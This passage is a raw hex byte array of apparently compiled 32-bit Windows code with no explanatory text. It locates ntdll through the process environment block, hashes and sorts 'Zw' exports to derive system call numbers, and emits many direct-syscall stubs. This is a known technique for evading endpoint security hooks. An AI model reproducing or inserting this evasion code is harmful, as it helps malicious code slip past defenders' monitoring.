5,0xF0,0x3B,0x45,0xEC,0x74,0x0F,0x0F,0xBF,0x45,0xEA,0x39,0x45,0x10,0x0F,0x8F,0xBF,0xFE,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0x14,0x00,0x74,0x0D,0x83,0x7D,0xE4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF4,0xC9,0xC3,0x90,0x90,0xB8,0xAD,0xDE,0xDE,0xC0,0xC3,0x90,0x0F,0x0B,0x55,0x89,0xE5,0x83,0xEC,0x18,0xC7,0x04,0x24,0x0F,0x2A,0x9B,0xCD,0xE8,0xA8,0x05,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xD5,0x0F,0x34,0xC6,0x45,0xD7,0xC3,0x8B,0x45,0x0C,0x83,0xE8,0x02,0x89,0x45,0xE0,0xE8,0xE2,0x05,0x00,0x00,0x85,0xC0,0x74,0x1E,0xC7,0x45,0xDC,0xC0,0x00,0x00,0x00,0x8B,0x45,0xDC,0x64,0x8B,0x00,0x89,0x45,0xD8,0x8B,0x45,0xD8,0x89,0x45,0xE4,0x8B,0x45,0xE4,0xE9,0x00,0x01,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x35,0x8B,0x55,0x08,0x8B,0x45,0xF4,0x01,0xD0,0x89,0x45,0xE4,0xC7,0x44,0x24,0x08,0x03,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x44,0x24,0x04,0x8D,0x45,0xD5,0x89,0x04,0x24,0xE8,0x0E,0x44,0x00,0x00,0x85,0xC0,0x75,0x08,0x8B,0x45,0xE4,0xE9,0xC6,0x00,0x00,0x00,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF4,0x3B,0x45,0xE0,0x72,0xC3,0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0xE9,0x9C,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xEB,0x3B,0x8B,0x55,0x08,0x8B,0x45,0xEC,0x01,0xC2,0x8B,0x45,0xF0,0x0F,0xAF,0x45,0x0C,0x01,0xD0,0x89,0x45,0xE4,0xC7,0x44,0x24,0x08,0x03,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x44,0x24,0x04,0x8D,0x45,0xD5,0x89,0x04,0x24,0xE8,0xB3,0x43,0x00,0x00,0x85,0xC0,0x75,0x05,0x8B,0x45,0xE4,0xEB,0x6E,0x83,0x45,0xEC,0x01,0x8B,0x45,0xEC,0x3B,0x45,0xE0,0x72,0xBD,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xEB,0x3B,0x8B,0x55,0x08,0x8B,0x45,0xE8,0x01,0xC2,0x8B,0x45,0xF0,0x0F,0xAF,0x45,0x0C,0x29,0xC2,0x89,0x55,0xE4,0xC7,0x44,0x24,0x08,0x03,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x44,0x24,0x04,0x8D,0x45,0xD5,0x89,0x04,0x24,0xE8,0x67,0x43,0x00,0x00,0x85,0xC0,0x75,0x05,0x8B,0x45,0xE4,0xEB,0x22,0x83,0x45,0xE8,0x01,0x8B,0x45,0xE8,0x3B,0x45,0xE0,0x72,0xBD,0x83,0x45,0xF0,0x01,0x81,0x7D,0xF0,0x25,0x02,0x00,0x00,0x0F,0x86,0x57,0xFF,0xFF,0xFF,0xB8,0x68,0x28,0x88,0x6C,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0xDE,0xC0,0x37,0x13,0xEB,0x24,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x8B,0x55,0x08,0x01,0xD0,0x0F,0xB7,0x00,0x66,0x89,0x45,0xF6,0x0F,0xB7,0x45,0xF6,0x8B,0x55,0xF8,0xC1,0xCA,0x08,0x01,0xD0,0x31,0x45,0xF8,0x8B,0x55,0x08,0x8B,0x45,0xFC,0x01,0xD0,0x0F,0xB6,0x00,0x84,0xC0,0x75,0xCD,0x8B,0x45,0xF8,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x81,0xEC,0x84,0x00,0x00,0x00,0xA1,0x40,0xB0,0x88,0x6C,0x85,0xC0,0x74,0x0A,0xB8,0x01,0x00,0x00,0x00,0xE9,0x9C,0x03,0x00,0x00,0xC7,0x45,0xA4,0x30,0x00,0x00,0x00,0x8B,0x45,0xA4,0x64,0x8B,0x00,0x89,0x45,0xA0,0x8B,0x45,0xA0,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x8B,0x40,0x0C,0x89,0x45,0xD8,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xD8,0x8B,0x40,0x0C,0x89,0x45,0xEC,0xE9,0x82,0x00,0x00,0x00,0x8B,0x45,0xEC,0x8B,0x40,0x18,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x89,0xC2,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x83,0xC0,0x78,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x00,0x89,0x45,0xC8,0x83,0x7D,0xC8,0x00,0x74,0x40,0x8B,0x55,0xF0,0x8B,0x45,0xC8,0x01,0xD0,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x8B,0x50,0x0C,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xC4,0x8B,0x45,0xC4,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6E,0x74,0x64,0x6C,0x75,0x19,0x8B,0x45,0xC4,0x83,0xC0,0x04,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6C,0x2E,0x64,0x6C,0x74,0x1E,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xEC,0x8B,0x00,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x85,0x70,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBE,0x02,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x40,0x18,0x89,0x45,0xE8,0x8B,0x45,0xF4,0x8B,0x50,0x1C,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xC0,0x8B,0x45,0xF4,0x8B,0x50,0x20,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xBC,0x8B,0x45,0xF4,0x8B,0x50,0x24,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xB8,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x44,0xB0,0x88,0x6C,0x8B,0x45,0xE8,0x05,0xFF,0xFF,0xFF,0x3F,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xBC,0x01,0xD0,0x8B,0x10,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xB0,0x8B,0x45,0xB0,0x0F,0xB7,0x00,0x66,0x3D,0x5A,0x77,0x75,0x69,0x8B,0x55,0xE4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x8D,0x1C,0x02,0x8B,0x45,0xB0,0x89,0x04,0x24,0xE8,0x2D,0xFE,0xFF,0xFF,0x89,0x03,0x8B,0x45,0xE8,0x05,0xFF,0xFF,0xFF,0x7F,0x8D,0x14,0x00,0x8B,0x45,0xB8,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xC0,0x8D,0x0C,0x02,0x8B,0x55,0xE4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x01,0x89,0x42,0x04,0x83,0x45,0xE4,0x01,0x81,0x7D,0xE4,0x26,0x02,0x00,0x00,0x74,0x10,0x83,0x6D,0xE8,0x01,0x83,0x7D,0xE8,0x00,0x0F,0x85,0x5F,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x8B,0x45,0xE4,0xA3,0x40,0xB0,0x88,0x6C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0x3A,0x01,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0x16,0x01,0x00,0x00,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x48,0x04,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x40,0x04,0x39,0xC8,0x0F,0x83,0xDB,0x00,0x00,0x00,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x00,0x89,0x45,0x94,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x40,0x04,0x89,0x45,0x98,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x8D,0x0C,0x02,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x01,0x89,0x02,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x8D,0x0C,0x02,0x8B,0x55,0xE0,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x41,0x04,0x89,0x42,0x04,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x45,0x94,0x89,0x02,0x8B,0x45,0xE0,0x8D,0x50,0x01,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xC2,0x8B,0x45,0x98,0x89,0x42,0x04,0x83,0x45,0xE0,0x01,0xA1,0x40,0xB0,0x88,0x6C,0x2B,0x45,0xE4,0x83,0xE8,0x01,0x39,0x45,0xE0,0x0F,0x82,0xD6,0xFE,0xFF,0xFF,0x83,0x45,0xE4,0x01,0xA1,0x40,0xB0,0x88,0x6C,0x83,0xE8,0x01,0x39,0x45,0xE4,0x0F,0x82,0xB5,0xFE,0xFF,0xFF,0x8B,0x45,0xB4,0x83,0xC0,0x0C,0x8B,0x50,0x04,0x8B,0x45,0xB4,0x8B,0x40,0x04,0x29,0xC2,0x89,0x55,0xAC,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xEB,0x4B,0x8B,0x55,0xE4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x01,0xD0,0x8B,0x50,0x04,0x8B,0x45,0xF0,0x01,0xD0,0x89,0x45,0xA8,0x8B,0x55,0xE4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x89,0xC2,0x8B,0x45,0xB4,0x8D,0x1C,0x02,0x8B,0x45,0xAC,0x89,0x44,0x24,0x04,0x8B,0x45,0xA8,0x89,0x04,0x24,0xE8,0xC9,0xFA,0xFF,0xFF,0x89,0x43,0x08,0x83,0x45,0xE4,0x01,0xA1,0x40,0xB0,0x88,0x6C,0x83,0xE8,0x01,0x39,0x45,0xE4,0x72,0xA8,0xB8,0x01,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x18,0xE8,0x37,0xFC,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x39,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x21,0x8B,0x55,0xF4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x05,0x44,0xB0,0x88,0x6C,0x8B,0x00,0x39,0x45,0x08,0x75,0x05,0x8B,0x45,0xF4,0xEB,0x13,0x83,0x45,0xF4,0x01,0xA1,0x40,0xB0,0x88,0x6C,0x39,0x45,0xF4,0x72,0xD5,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x18,0xE8,0xE6,0xFB,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x49,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x31,0x8B,0x55,0xF4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x05,0x44,0xB0,0x88,0x6C,0x8B,0x00,0x39,0x45,0x08,0x75,0x15,0x8B,0x55,0xF4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x05,0x4C,0xB0,0x88,0x6C,0x8B,0x00,0xEB,0x13,0x83,0x45,0xF4,0x01,0xA1,0x40,0xB0,0x88,0x6C,0x39,0x45,0xF4,0x72,0xC5,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x64,0xA1,0xC0,0x00,0x00,0x00,0x85,0xC0,0x75,0x06,0xB8,0x00,0x00,0x00,0x00,0xC3,0xB8,0x01,0x00,0x00,0x00,0xC3,0x90,0x0F,0x0B,0x8B,0x04,0x24,0xC3,0x90,0x0F,0x0B,0x68,0x0F,0x2A,0x9B,0xCD,0xE8,0x75,0xFF,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x1C,0xFF,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x2F,0x1A,0xBF,0xFF,0xE8,0x54,0xFF,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xFB,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x67,0x75,0x8B,0x11,0xE8,0x33,0xFF,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xDA,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x3F,0xD3,0x52,0x22,0xE8,0x12,0xFF,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xB9,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xA2,0x15,0xA9,0x8F,0xE8,0xF1,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x98,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x20,0xBC,0xBC,0xBD,0xE8,0xD0,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x77,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x80,0xE9,0x93,0x03,0xE8,0xAF,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x56,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x32,0x1B,0xAB,0x17,0xE8,0x8E,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x35,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x1B,0x03,0x95,0x05,0xE8,0x6D,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x14,0xFE,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x05,0x2F,0x93,0x01,0xE8,0x4C,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xF3,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xB6,0x8E,0x01,0x96,0xE8,0x2B,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xD2,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x1A,0x2A,0xB2,0x24,0xE8,0x0A,0xFE,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xB1,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xE3,0xE2,0x98,0x11,0xE8,0xE9,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x90,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x8F,0x2C,0x5B,0x4A,0xE8,0xC8,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x6F,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x13,0xA4,0xBF,0x9C,0xE8,0xA7,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x4E,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x4F,0xF6,0x23,0x0E,0xE8,0x86,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x2D,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xE3,0x76,0x63,0x42,0xE8,0x65,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x0C,0xFD,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x1A,0x6A,0xB2,0x64,0xE8,0x44,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xEB,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xA0,0x64,0x2E,0x65,0xE8,0x23,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xCA,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x0C,0x32,0x9F,0x1D,0xE8,0x02,0xFD,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xA9,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x36,0x71,0x91,0x27,0xE8,0xE1,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x88,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x84,0x83,0x9C,0x09,0xE8,0xC0,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x67,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x87,0x5F,0xBE,0x1A,0xE8,0x9F,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x46,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xEA,0x62,0xBD,0xBC,0xE8,0x7E,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x25,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x6D,0xBA,0xD1,0x8A,0xE8,0x5D,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x04,0xFC,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x0F,0x98,0x97,0x8C,0xE8,0x3C,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xE3,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xA7,0x8C,0x3A,0xA6,0xE8,0x1B,0xFC,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xC2,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xF9,0x12,0x69,0xF0,0xE8,0xFA,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xA1,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x18,0x39,0xA3,0x73,0xE8,0xD9,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x80,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xFB,0x5E,0xAB,0x7C,0xE8,0xB8,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x5F,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x1E,0x5C,0x98,0x38,0xE8,0x97,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x3E,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x82,0x4D,0xDF,0x84,0xE8,0x76,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x1D,0xFB,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x0C,0x86,0xB2,0xA1,0xE8,0x55,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xFC,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x80,0x2D,0x1F,0x0A,0xE8,0x34,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xDB,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x13,0x36,0x82,0x14,0xE8,0x13,0xFB,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xBA,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x8A,0xF2,0x3D,0xE6,0xE8,0xF2,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x99,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x3A,0x3D,0xA8,0x32,0xE8,0xD1,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x78,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x5C,0x59,0xF3,0x6A,0xE8,0xB0,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x57,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x6E,0x23,0x30,0xE8,0xE8,0x8F,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x36,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xE3,0x55,0x3F,0x11,0xE8,0x6E,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x15,0xFA,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x04,0x0E,0xDA,0x6B,0xE8,0x4D,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xF4,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x10,0xDE,0xB1,0x12,0xE8,0x2C,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xD3,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x20,0x35,0x89,0x10,0xE8,0x0B,0xFA,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xB2,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xB5,0x3A,0x1B,0x38,0xE8,0xEA,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x91,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x9C,0xD0,0xC6,0x20,0xE8,0xC9,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x70,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x3C,0xF4,0x9E,0xBA,0xE8,0xA8,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x4F,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x44,0x8D,0x66,0xCB,0xE8,0x87,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x2E,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x8F,0x59,0x39,0x13,0xE8,0x66,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x0D,0xF9,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xBA,0x75,0xEB,0xB6,0xE8,0x45,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xEC,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xEF,0xD9,0xB0,0x1B,0xE8,0x24,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xCB,0xF8,0xFF,0xFF,0x83,0